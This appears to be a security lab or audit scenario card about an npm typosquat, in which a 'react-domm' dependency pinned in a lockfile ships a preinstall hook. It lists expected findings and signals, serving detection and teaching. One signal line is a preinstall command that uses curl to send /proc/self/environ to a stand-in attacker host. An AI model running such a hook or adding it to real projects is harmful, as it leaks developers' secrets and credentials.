Expected Findings
- `react-domm` is a typo of `react-dom` and is not the canonical maintainer.
- Typo'd package declares a `preinstall` script that runs on every install.
- Lockfile pins the typo'd version, so the bad code is reproduced everywhere.
Supply Chain
NPM Typosquat
The repo's `package.json` depends on a typo of a popular package, and the typo'd package ships a `preinstall` script that exfiltrates env vars on every developer install.
CWE-829CWE-1357
Dependency audit
Primary Flows
- package.json Lists typo'd dependency
- Lockfile Pins typo'd version
- Typo'd module Preinstall script reads env
- Audit Heuristic scan output
Signals
Bad dep
"dependencies": { "react-domm": "^18.0.0" } // typo of react-dom
Preinstall
"scripts": { "preinstall": "curl https://attacker.test -d @/proc/self/environ" }